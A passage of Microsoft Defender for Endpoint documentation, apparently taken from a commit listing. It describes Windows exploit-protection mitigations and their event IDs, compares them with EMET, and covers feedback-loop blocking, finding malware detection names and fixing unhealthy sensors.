-When the memory manager is mapping in the image into the process, Mandatory ASLR will forcibly rebase DLLs and EXEs that haven't opted in to ASLR. Note, however, that this rebasing has no entropy, and can therefore be placed at a predictable location in memory. For rebased and randomized location of binaries, this mitigation should be paired with [Randomize memory allocations (Bottom-up ASLR)](#randomize-memory-allocations-bottom-up-aslr).
-
-### Compatibility considerations
-
-This compatibility impact of ASLR is typically constrained to older applications that were built using compilers that made assumptions about the base address of a binary file or have stripped out base relocation information. This can lead to unpredictable errors as the execution flow attempts to jump to the expected, rather than the actual, location in memory.
-
-### Configuration options
-
-**Do not allow stripped images** - This option blocks the loading of images that have had relocation information stripped. The Windows PE file format contains absolute addresses, and the compiler also generates a [base relocation table that the loader can use to find all relative memory references and their offset, so they can be updated if the binary doesn't load at its preferred base address. Some older applications strip out this information in production builds, and therefore these binaries can't be rebased. This mitigation blocks such binaries from being loaded (instead of allowing them to load at their preferred base address).
-
-> [!Note]
-> **Force randomization for images (Mandatory ASLR)** has no audit mode.
--
-## Hardware-enforced stack protection
-
-### Description
-
-Hardware-enforced stack protection offers robust protection against ROP exploits since it maintains a record of the intended execution flow of a program. To ensure smooth ecosystem adoption and application compatibility, Windows will offer this protection as an opt-in model, so developers can receive this protection, at your own pace.
-
-### Compatibility considerations
-
-Hardware-enforced stack protection will only work on chipsets with support for hardware shadow stacks, Intel's Control-flow Enforcement Technology (CET) or AMD shadow stacks.
-
-### Configuration options
-
-**Audit only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-**Enforce for all modules instead of Compatible modules** - You can enable this mitigation to Enforce for all modules instead of Compatible modules.
-
-## Import address filtering (IAF)
-
-### Description
-
-The import address filtering (IAF) mitigation helps mitigate the risk of an adversary changing the control flow of an application by modifying the import address table (IAT) to redirect to arbitrary code of the attacker's choice when that function is called. An attacker could use this approach to hijack control, or to intercept, inspect, and potentially block calls to sensitive APIs.
-
-The memory pages for all protected APIs have the [PAGE_GUARD](/windows/win32/memory/creating-guard-pages) protection applied to them. When someone tries to access this memory, it generates a STATUS_GUARD_PAGE_VIOLATION. The mitigation handles this exception, and if the accessing instruction doesn't pass validation, the process is terminated.
-
-This mitigation protects the following Windows APIs:
--- `GetProcAddress`-- `GetProcAddressForCaller`-- `LoadLibraryA`-- `LoadLibraryExA`-- `LoadLibraryW`-- `LoadLibraryExW`-- `LdrGetProcedureAddress`-- `LdrGetProcedureAddressEx`-- `LdrGetProcedureAddressForCaller`-- `LdrLoadDll`-- `VirtualProtect`-- `VirtualProtectEx`-- `VirtualAlloc`-- `VirtualAllocEx`-- `NtAllocateVirtualMemory`-- `NtProtectVirtualMemory`-- `CreateProcessA`-- `CreateProcessW`-- `WinExec`-- `CreateProcessAsUserA`-- `CreateProcessAsUserW`-- `GetModuleHandleA`-- `GetModuleHandleW`-- `RtlDecodePointer`-- `DecodePointer`-
-### Compatibility considerations
-
-Legitimate applications that perform API interception may be detected by this mitigation and cause some applications to crash. Examples include security software and application compatibility shims.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Randomize memory allocations (Bottom-up ASLR)
-
-### Description
-
-Randomize memory allocations (Bottom-up ASLR) adds entropy to relocations, so their location is randomized and therefore less predictable. This mitigation requires Mandatory ASLR to take effect.
-
-The size of the 32-bit address space places practical constraints on the entropy that can be added, and therefore 64-bit applications make it more difficult for an attacker to guess a location in memory.
-
-### Compatibility considerations
-
-Most applications that are compatible with Mandatory ASLR (rebasing) are also compatible with the other entropy of Bottom-up ASLR. Some applications may have pointer-truncation issues if they're saving local pointers in 32-bit variables (expecting a base address below 4 GB), and thus will be incompatible with the high entropy option (which can be disabled).
-
-### Configuration options
-
-**Don't use high entropy** - this option disables the use of high-entropy ASLR, which adds 24 bits of entropy (1 TB of variance) into the bottom-up allocation for 64-bit applications.
-
-> [!Note]
-> **Randomize memory allocations (Bottom-up ASLR)** has no audit mode.
-
-## Simulate execution (SimExec)
-
-### Description
-
-Simulate execution (SimExec) is a mitigation for 32-bit applications only. This helps validate that calls to sensitive APIs will return to legitimate caller functions. It does this by intercepting calls into sensitive APIs, and then simulating the execution of those APIs by walking through the encoded assembly language instructions looking for the RET instruction, which should return to the caller. It then inspects that function and walks backwards in memory to find the preceding CALL instruction to determine whether the function and CALL instruction match, and that the RET hasn't been intercepted.
-
-The APIs intercepted by this mitigation are:
--- `LoadLibraryA`-- `LoadLibraryW`-- `LoadLibraryExA`-- `LoadLibraryExW`-- `LdrLoadDll`-- `VirtualAlloc`-- `VirtualAllocEx`-- `NtAllocateVirtualMemory`-- `VirtualProtect`-- `VirtualProtectEx`-- `NtProtectVirtualMemory`-- `HeapCreate`-- `RtlCreateHeap`-- `CreateProcessA`-- `CreateProcessW`-- `CreateProcessInternalA`-- `CreateProcessInternalW`-- `NtCreateUserProcess`-- `NtCreateProcess`-- `NtCreateProcessEx`-- `CreateRemoteThread`-- `CreateRemoteThreadEx`-- `NtCreateThreadEx`-- `WriteProcessMemory`-- `NtWriteVirtualMemory`-- `WinExec`-- `CreateFileMappingA`-- `CreateFileMappingW`-- `CreateFileMappingNumaW`-- `NtCreateSection`-- `MapViewOfFile`-- `MapViewOfFileEx`-- `MapViewOfFileFromApp`-- `LdrGetProcedureAddressForCaller`-
-If a ROP gadget is detected, the process is terminated.
-
-### Compatibility considerations
-
-Applications that perform API interception, particularly security software, can cause compatibility problems with this mitigation.
-
-This mitigation is incompatible with the Arbitrary Code Guard mitigation.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Validate API invocation (CallerCheck)
-
-### Description
-
-Validate API invocation (CallerCheck) is a mitigation for return-oriented programming (ROP) techniques that validates that sensitive APIs were called from a valid caller. This mitigation inspects the passed return address, and then heuristically disassembles backwards to find a call above the return address to determine if the call target matches the parameter passed into the function.
-
-The APIs intercepted by this mitigation are:
--- `LoadLibraryA`-- `LoadLibraryW`-- `LoadLibraryExA`-- `LoadLibraryExW`-- `LdrLoadDll`-- `VirtualAlloc`-- `VirtualAllocEx`-- `NtAllocateVirtualMemory`-- `VirtualProtect`-- `VirtualProtectEx`-- `NtProtectVirtualMemory`-- `HeapCreate`-- `RtlCreateHeap`-- `CreateProcessA`-- `CreateProcessW`-- `CreateProcessInternalA`-- `CreateProcessInternalW`-- `NtCreateUserProcess`-- `NtCreateProcess`-- `NtCreateProcessEx`-- `CreateRemoteThread`-- `CreateRemoteThreadEx`-- `NtCreateThreadEx`-- `WriteProcessMemory`-- `NtWriteVirtualMemory`-- `WinExec`-- `CreateFileMappingA`-- `CreateFileMappingW`-- `CreateFileMappingNumaW`-- `NtCreateSection`-- `MapViewOfFile`-- `MapViewOfFileEx`-- `MapViewOfFileFromApp`-- `LdrGetProcedureAddressForCaller`-
-If a ROP gadget is detected, the process is terminated.
-
-### Compatibility considerations
-
-Applications that perform API interception, particularly security software, can cause compatibility problems with this mitigation.
-
-This mitigation is incompatible with the Arbitrary Code Guard mitigation.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Validate exception chains (SEHOP)
-
-### Description
-
-Validate exception chains (SEHOP) is a mitigation against the *Structured Exception Handler (SEH) overwrite* exploitation technique. [Structured exception handling](/windows/win32/debug/structured-exception-handling) is the process by which an application can ask to handle a particular exception. Exception handlers are chained together, so that if one exception handler chooses not to handle a particular exception, it can be passed on to the next exception handler in the chain until one decides to handle it. Because the list of handler is dynamic, it's stored on the stack. An attacker can use a stack overflow vulnerability to then overwrite the exception handler with a pointer to the code of the attacker's choice.
-
-This mitigation relies on the design of SEH, where each SEH entry contains both a pointer to the exception handler, and a pointer to the next handler in the exception chain. This mitigation is called by the exception dispatcher, which validates the SEH chain when an exception is invoked. It verifies that:
--- All exception chain records are within the stack boundaries-- All exception records are aligned-- No exception handler pointers are pointing to the stack-- There are no backward pointers-- The exception chain ends at a known final exception handler-
-If these validations fail, then exception handling is aborted, and the exception won't be handled.
-
-### Compatibility considerations
-
-Compatibility issues with SEHOP are relatively rare. It's uncommon for an application to take a dependency on corrupting the exception chain. However, some applications are impacted by the subtle changes in timing, which may manifest as a race condition that reveals a latent multi-threading bug in the application.
-
-### Configuration options
-
-> [!Note]
-> **Validate exception chains (SEHOP)** has no audit mode.
-
-## Validate handle usage
-
-### Description
-
-*Validate handle usage* is a mitigation that helps protect against an attacker using an existing handle to access a protected object. A [handle](/windows/win32/sysinfo/handles-and-objects) is a reference to a protected object. If application code is referencing an invalid handle, that could indicate that an adversary is attempting to use a handle it has previously recorded (but which application reference counting wouldn't be aware of). If the application attempts to use an invalid object, instead of simply returning null, the application raises an exception (STATUS_INVALID_HANDLE).
-
-This mitigation is automatically applied to Windows Store applications.
-
-### Compatibility considerations
-
-Applications that weren't accurately tracking handle references, and which weren't wrapping these operations in exception handlers, will potentially be impacted by this mitigation.
-
-### Configuration options
-
-> [!Note]
-> **Validate handle usage** has no audit mode.
-
-## Validate heap integrity
-
-### Description
-
-The *validate heap integrity* mitigation increases the protection level of heap mitigations in Windows, by causing the application to terminate if a heap corruption is detected. The mitigations include:
--- Preventing a HEAP handle from being freed-- Performing another validation on extended block headers for heap allocations-- Verifying that heap allocations aren't already flagged as in-use-- Adding guard pages to large allocations, heap segments, and subsegments above a minimum size-
-### Compatibility considerations
-
-This mitigation is already applied by default for 64-bit applications and for 32-bit applications targeting Windows Vista or later. Legacy applications from Windows XP or earlier are most at-risk, though compatibility issues are rare.
-
-### Configuration options
-
-> [!Note]
-> **Validate heap integrity** has no audit mode.
-
-## Validate image dependency integrity
-
-### Description
-
-The *validate image dependency* mitigation helps protect against attacks that attempt to substitute code for dlls that are statically linked by Windows binaries. The technique of DLL planting abuses the loader's search mechanism to inject malicious code, which can be used to get malicious code running in an elevated context. When the loader is loading a Windows signed binary, and then loads up any dlls that the binary depends on, these binaries are verified to ensure that they're also digitally signed as a Windows binary. If they fail the signature check, the dll won't be loaded, and throws an exception, returning a status of STATUS_INVALID_IMAGE_HASH.
-
-### Compatibility considerations
-
-Compatibility issues are uncommon. Applications that depend on replacing Windows binaries with local private versions are impacted, and there's also a small risk of revealing subtle timing bugs in multi-threaded applications.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Validate stack integrity (StackPivot)
-
-### Description
-
-The *validate stack integrity (StackPivot)* mitigation helps protect against the Stack Pivot attack, a ROP attack where an attacker creates a fake stack in heap memory, and then tricks the application into returning into the fake stack that controls the flow of execution.
-
-This mitigation intercepts many Windows APIs, and inspects the value of the stack pointer. If the address of the stack pointer doesn't fall between the bottom and the top of the stack, then an event is recorded and, if not in audit mode, the process is terminated.
-
-The APIs intercepted by this mitigation are:
--- `LoadLibraryA`-- `LoadLibraryW`-- `LoadLibraryExA`-- `LoadLibraryExW`-- `LdrLoadDll`-- `VirtualAlloc`-- `VirtualAllocEx`-- `NtAllocateVirtualMemory`-- `VirtualProtect`-- `VirtualProtectEx`-- `NtProtectVirtualMemory`-- `HeapCreate`-- `RtlCreateHeap`-- `CreateProcessA`-- `CreateProcessW`-- `CreateProcessInternalA`-- `CreateProcessInternalW`-- `NtCreateUserProcess`-- `NtCreateProcess`-- `NtCreateProcessEx`-- `CreateRemoteThread`-- `CreateRemoteThreadEx`-- `NtCreateThreadEx`-- `WriteProcessMemory`-- `NtWriteVirtualMemory`-- `WinExec`-- `CreateFileMappingA`-- `CreateFileMappingW`-- `CreateFileMappingNumaW`-- `NtCreateSection`-- `MapViewOfFile`-- `MapViewOfFileEx`-- `MapViewOfFileFromApp`-- `LdrGetProcedureAddressForCaller`-
-### Compatibility considerations
-
-Applications that are using fake stacks are impacted, and there's also a small risk of revealing subtle timing bugs in multi-threaded applications.
-Applications that perform API interception, particularly security software, can cause compatibility problems with this mitigation.
-
-This mitigation is incompatible with the Arbitrary Code Guard mitigation.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
security Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exploit-protection.md
- Title: Apply mitigations to help prevent attacks through vulnerabilities
-description: Protect devices against exploits with Windows 10 or Windows 11. Windows has advanced exploit protection capabilities, building upon and improving the settings available in Enhanced Mitigation Experience Toolkit (EMET).
----------- m365-security-- tier2-- mde-asr Previously updated : 12/18/2020--
-# Protect devices from exploits
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Exploit protection automatically applies many exploit mitigation techniques to operating system processes and apps. Exploit protection is supported beginning with Windows 10, version 1709, Windows 11, and Windows Server, version 1803.
-
-Exploit protection works best with [Defender for Endpoint](microsoft-defender-endpoint.md) - which gives you detailed reporting into exploit protection events and blocks as part of the usual [alert investigation scenarios](investigate-alerts.md).
-
-You can [enable exploit protection](enable-exploit-protection.md) on an individual device, and then use [Group Policy](import-export-exploit-protection-emet-xml.md) to distribute the XML file to multiple devices at once.
-
-When a mitigation is found on the device, a notification is displayed from the Action Center. You can [customize the notification](attack-surface-reduction-rules-deployment-implement.md#customize-attack-surface-reduction-rules) with your company details and contact information. You can also enable the rules individually to customize what techniques the feature monitors.
-
-You can also use [audit mode](evaluate-exploit-protection.md) to evaluate how exploit protection would affect your organization if it were enabled.
-
-Many of the features in the [Enhanced Mitigation Experience Toolkit (EMET)](https://technet.microsoft.com/security/jj653751) are included in exploit protection. In fact, you can convert and import existing your EMET configuration profiles into exploit protection. To learn more, see [Import, export, and deploy exploit protection configurations](/microsoft-365/security/defender-endpoint/import-export-exploit-protection-emet-xml).
-
-> [!IMPORTANT]
-> If you are currently using EMET you should be aware that [EMET reached end of support on July 31, 2018](https://blogs.technet.microsoft.com/srd/2016/11/03/beyond-emet/). Consider replacing EMET with exploit protection in Windows 10.
-
-> [!WARNING]
-> Some security mitigation technologies may have compatibility issues with some applications. You should test exploit protection in all target use scenarios by using [audit mode](audit-windows-defender.md) before deploying the configuration across a production environment or the rest of your network.
-
-<a name='review-exploit-protection-events-in-the-microsoft-365-defender-portal'></a>
-
-## Review exploit protection events in the Microsoft Defender portal
-
-Defender for Endpoint provides detailed reporting into events and blocks as part of its alert investigation scenarios.
-
-You can query Defender for Endpoint data by using [Advanced hunting](/microsoft-365/security/defender-endpoint/advanced-hunting-overview). If you're using [audit mode](audit-windows-defender.md), you can use advanced hunting to see how exploit protection settings could affect your environment.
-
-Here's an example query:
-
-```kusto
-DeviceEvents
-| where ActionType startswith 'ExploitGuard' and ActionType !contains 'NetworkProtection'
-```
-
-## Review exploit protection events in Windows Event Viewer
-
-You can review the Windows event log to see events that are created when exploit protection blocks (or audits) an app:<br/><br/>
-
-|Provider/source | Event ID | Description|
-|:|:|:|
-|Security-Mitigations | 1 | ACG audit |
-|Security-Mitigations | 2 | ACG enforce |
-|Security-Mitigations | 3 | Don't allow child processes audit |
-|Security-Mitigations | 4 | Don't allow child processes block |
-|Security-Mitigations | 5 | Block low integrity images audit |
-|Security-Mitigations | 6 | Block low integrity images block |
-|Security-Mitigations | 7 | Block remote images audit |
-|Security-Mitigations | 8 | Block remote images block |
-|Security-Mitigations | 9 | Disable win32k system calls audit |
-|Security-Mitigations | 10 | Disable win32k system calls block |
-|Security-Mitigations | 11 | Code integrity guard audit |
-|Security-Mitigations | 12 | Code integrity guard block |
-|Security-Mitigations | 13 | EAF audit |
-|Security-Mitigations | 14 | EAF enforce |
-|Security-Mitigations | 15 | EAF+ audit |
-|Security-Mitigations | 16 | EAF+ enforce |
-|Security-Mitigations | 17 | IAF audit |
-|Security-Mitigations | 18 | IAF enforce |
-|Security-Mitigations | 19 | ROP StackPivot audit |
-|Security-Mitigations | 20 | ROP StackPivot enforce |
-|Security-Mitigations | 21 | ROP CallerCheck audit |
-|Security-Mitigations | 22 | ROP CallerCheck enforce |
-|Security-Mitigations | 23 | ROP SimExec audit |
-|Security-Mitigations | 24 | ROP SimExec enforce |
-|WER-Diagnostics | 5 | CFG Block |
-|Win32K | 260 | Untrusted Font |
-
-## Mitigation comparison
-
-The mitigations available in EMET are included natively in Windows 10 (starting with version 1709), Windows 11, and Windows Server (starting with version 1803), under [Exploit protection](exploit-protection.md).
-
-The table in this section indicates the availability and support of native mitigations between EMET and exploit protection.<br/><br/>
-
-|Mitigation | Available under exploit protection | Available in EMET |
-|:|:|:|
-|Arbitrary code guard (ACG) | Yes | Yes<br />As "Memory Protection Check" |
-|Block remote images | Yes | Yes<br/>As "Load Library Check" |
-|Block untrusted fonts | Yes | Yes |
-|Data Execution Prevention (DEP) | Yes | Yes |
-|Export address filtering (EAF) | Yes | Yes |
-|Force randomization for images (Mandatory ASLR) | Yes | Yes |
-|NullPage Security Mitigation | Yes<br />Included natively in Windows 10 and Windows 11 <br/>For more information, see [Mitigate threats by using Windows 10 security features](/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#understanding-windows-10-in-relation-to-the-enhanced-mitigation-experience-toolkit) | Yes |
-|Randomize memory allocations (Bottom-Up ASLR) | Yes | Yes |
-|Simulate execution (SimExec) | Yes | Yes |
-|Validate API invocation (CallerCheck) | Yes | Yes |
-|Validate exception chains (SEHOP) | Yes | Yes |
-|Validate stack integrity (StackPivot) | Yes | Yes |
-|Certificate trust (configurable certificate pinning) | Windows 10 and Windows 11 provide enterprise certificate pinning | Yes |
-|Heap spray allocation | Ineffective against newer browser-based exploits; newer mitigations provide better protection<br/>For more information, see [Mitigate threats by using Windows 10 security features](/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#understanding-windows-10-in-relation-to-the-enhanced-mitigation-experience-toolkit) | Yes |
-|Block low integrity images | Yes | No |
-|Code integrity guard | Yes | No |
-|Disable extension points | Yes | No |
-|Disable Win32k system calls | Yes | No |
-|Don't allow child processes | Yes | No |
-|Import address filtering (IAF) | Yes | No |
-|Validate handle usage | Yes | No |
-|Validate heap integrity | Yes | No |
-|Validate image dependency integrity | Yes | No |
-
-> [!NOTE]
-
-> The Advanced ROP mitigations that are available in EMET are superseded by ACG in Windows 10 and Windows 11, which other EMET advanced settings are enabled by default, as part of enabling the anti-ROP mitigations for a process. For more information on how Windows 10 employs existing EMET technology, see the [Mitigation threats by using Windows 10 security features](/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#understanding-windows-10-in-relation-to-the-enhanced-mitigation-experience-toolkit).
-
-## See also
--- [Configure and audit exploit protection mitigations](customize-exploit-protection.md)-- [Troubleshoot exploit protection](troubleshoot-exploit-protection-mitigations.md)-- [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security Feedback Loop Blocking https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/feedback-loop-blocking.md
- Title: Feedback-loop blocking
-description: Feedback-loop blocking, also called rapid protection, is part of behavioral blocking and containment capabilities in Microsoft Defender for Endpoint
-keywords: behavioral blocking, rapid protection, feedback blocking, Microsoft Defender for Endpoint
-------
- - next-gen
- - mde-edr
---- m365-security-- tier2 Previously updated : 12/18/2020--
-# Feedback-loop blocking
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-## Overview
-
-Feedback-loop blocking, also referred to as rapid protection, is a component of [behavioral blocking and containment capabilities](/microsoft-365/security/defender-endpoint/behavioral-blocking-containment) in [Microsoft Defender for Endpoint](/windows/security/threat-protection/). With feedback-loop blocking, devices across your organization are better protected from attacks.
-
-## How feedback-loop blocking works
-
-When a suspicious behavior or file is detected, such as by [Microsoft Defender Antivirus](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-in-windows-10), information about that artifact is sent to multiple classifiers. The rapid protection loop engine inspects and correlates the information with other signals to arrive at a decision as to whether to block a file. Checking and classifying artifacts happens quickly. It results in rapid blocking of confirmed malware, and drives protection across the entire ecosystem.
-
-With rapid protection in place, an attack can be stopped on a device, other devices in the organization, and devices in other organizations, as an attack attempts to broaden its foothold.
--
-## Configuring feedback-loop blocking
-
-If your organization is using Defender for Endpoint, feedback-loop blocking is enabled by default. However, rapid protection occurs through a combination of Defender for Endpoint capabilities, machine learning protection features, and signal-sharing across Microsoft security services. Make sure the following features and capabilities of Defender for Endpoint are enabled and configured:
--- [Microsoft Defender for Endpoint baselines](/microsoft-365/security/defender-endpoint/configure-machines-security-baseline)--- [Devices onboarded to Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/onboard-configure)--- [EDR in block mode](/microsoft-365/security/defender-endpoint/edr-in-block-mode)--- [Attack surface reduction](/microsoft-365/security/defender-endpoint/attack-surface-reduction)--- [Next-generation protection](/windows/security/threat-protection/microsoft-defender-antivirus/configure-microsoft-defender-antivirus-features) (antivirus)-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Related articles
--- [Behavioral blocking and containment](behavioral-blocking-containment.md)--- [(Blog) Behavioral blocking and containment: Transforming optics into protection](https://www.microsoft.com/security/blog/2020/03/09/behavioral-blocking-and-containment-transforming-optics-into-protection/)--- [Helpful Microsoft Defender for Endpoint resources](/microsoft-365/security/defender-endpoint/helpful-resources)
security Find Defender Malware Name https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-defender-malware-name.md
- Title: Find malware detection names for Microsoft Defender for Endpoint
-description: How to find the names for the latest malware detections in Defender for Endpoint
-------- m365-security-- tier3- Previously updated : 06/26/2023--
-# Find malware detection names for Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-As malware naming schemes vary depending on who is first to report it, how it's referred to in the media, and how some companies use specific naming conventions, it can be confusing to understand how Defender for Endpoint detects specific malware families.
-
-Microsoft names specific malware according to the [Computer Antivirus Research Organization (CARO)](/microsoft-365/security/intelligence/malware-naming). For example, Microsoft detects the Sunburst cyberattack as **Trojan:MSIL/Solorigate.BR!dha**.
-
-To understand how Microsoft Defender for Endpoint detects specific malware families, you can follow the steps in [Find the detection name for a malware family](#find-the-detection-name-for-a-malware-family).
-
-## Find the detection name for a malware family
-
-To find the detection name of a malware family, you need to search the internet for the malware name plus "hash".
-
-1. Get the name of the malware family
-2. Search the web for *malware family* + **cyberattack + hash** to find the hash
-3. Look up the hash in [Virus Total](https://www.virustotal.com/)
-4. Find the Microsoft row and how we name the malware
-5. Look up the malware name in the [Microsoft Defender Security Intelligence website] (https://www.microsoft.com/en-us/wdsi/threats). You should see Microsoft information and guidance specific to that malware.
-
-For example, search for the "Sunburst cyberattack hash". One of the websites returned in the search results should have the hash. In this example, the hash is **a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc**. Then, look up this hash in [Virus Total](https://www.virustotal.com/).
-
-The results show the Microsoft row detects this malware as **Trojan:MSIL/Solorigate.BR!dha**. When you look up this malware name in the Microsoft Defender Security Intelligence website, you find information specific to that malware, including technical details and mitigation steps.
-
security Fix Unhealthy Sensors https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/fix-unhealthy-sensors.md
- Title: Fix unhealthy sensors in Microsoft Defender for Endpoint
-description: Fix device sensors that are reporting as misconfigured or inactive so that the service receives data from the device.
------- m365-security-- tier2-- ngp- Previously updated : 04/03/2024---
-# Fix unhealthy sensors in Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-fixsensor-abovefoldlink)
-
-Devices can be categorized as misconfigured or inactive are flagged for different reasons. This article provides information about why a device might be categorized as inactive or misconfigured.
-
-## Inactive devices
-
-An inactive device isn't necessarily flagged because of an issue. The following actions taken on a device can cause a device to be categorized as inactive:
--- Device isn't in use-- Device was reinstalled or renamed-- Device was off-boarded-- Device isn't sending signals--
-### Device isn't in use
-
-Any device that isn't in use for more than seven days retains 'Inactive' status in the portal.
-
-### Device was reinstalled or renamed
-
-A new device entity is generated in Microsoft Defender XDR for reinstalled or renamed devices. The previous device entity remains, with an 'Inactive' status in the portal. If you reinstalled a device and deployed the Defender for Endpoint package, search for the new device name to verify that the device is reporting normally.
-
-### Device was off-boarded
-
-If the device was off-boarded, it still appears in devices list. After seven days, the device health state should change to inactive.
-
-### Device isn't sending signals
-
-If the device isn't sending any signals to any Microsoft Defender for Endpoint channels for more than seven days for any reason, a device can be considered inactive. Misconfigured devices can also be considered inactive.
-
-## Misconfigured devices
-
-Misconfigured devices can further be classified to:
--- Impaired communications-- No sensor data-
-### Impaired communications
-
-This status indicates that there's limited communication between the device and the service.
-
-The following suggested actions can help fix issues related to a misconfigured device with impaired communications:
--- [Ensure the device has Internet connection](troubleshoot-onboarding.md#troubleshoot-onboarding-issues-on-the-device). The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and communicate with the Microsoft Defender for Endpoint service.--- [Verify client connectivity to Microsoft Defender for Endpoint service URLs](verify-connectivity.md). Verify the proxy configuration completed successfully, that WinHTTP can discover and communicate through the proxy server in your environment, and that the proxy server allows traffic to the Microsoft Defender for Endpoint service URLs.-
-If you took corrective actions and the device status is still misconfigured, [open a support ticket](https://go.microsoft.com/fwlink/?LinkID=761093&clcid=0x409).
-
-### No sensor data
-
-A misconfigured device with status 'No sensor data' has communication with the service but can only report partial sensor data.
-
-Follow theses actions to correct known issues related to a misconfigured device with status 'No sensor data':
--- [Ensure the device has Internet connection](troubleshoot-onboarding.md#troubleshoot-onboarding-issues-on-the-device). The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and communicate with the Microsoft Defender for Endpoint service.--- [Verify client connectivity to Microsoft Defender for Endpoint service URLs](verify-connectivity.md). Verify the proxy configuration completed successfully, that WinHTTP can discover and communicate through the proxy server in your environment, and that the proxy server allows traffic to the Microsoft Defender for Endpoint service URLs.--- [Ensure the diagnostic data service is enabled](troubleshoot-onboarding.md#ensure-the-diagnostics-service-is-enabled). If the devices aren't reporting correctly, you should verify that the Windows diagnostic data service is set to automatically start. Also verify that the Windows diagnostic data service is running on the endpoint.--- [Ensure that Microsoft Defender Antivirus isn't disabled by policy](troubleshoot-onboarding.md#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy). If your devices are running a third-party anti-malware client, Defender for Endpoint agent requires that the Microsoft Defender Antivirus Early Launch anti-malware (ELAM) driver is enabled.--- For macOS devices that sleep for more than approximately 48 hours (a weekend), Microsoft Defender for Endpoint on macOS still sends Command and Control (CnC) channel data, but doesn't send any Cyber channel data. After the devices are turned on and used on the first business day, the devices will show up as active.-
-If you took corrective actions and the device status is still misconfigured, [open a support ticket](https://go.microsoft.com/fwlink/?LinkID=761093&clcid=0x409).
-
-## See also
--- [Check sensor health state in Microsoft Defender for Endpoint](check-sensor-status.md)-- [Client analyzer overview](overview-client-analyzer.md)-- [Download and run the client analyzer](download-client-analyzer.md)-- [Run the client analyzer on Windows](run-analyzer-windows.md)-- [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md)-- [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)-
security Get Started Partner Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-started-partner-integration.md
- Title: Become a Microsoft Defender for Endpoint partner-
-description: Learn the steps and requirements to integrate your solution with Microsoft Defender for Endpoint and be a partner.
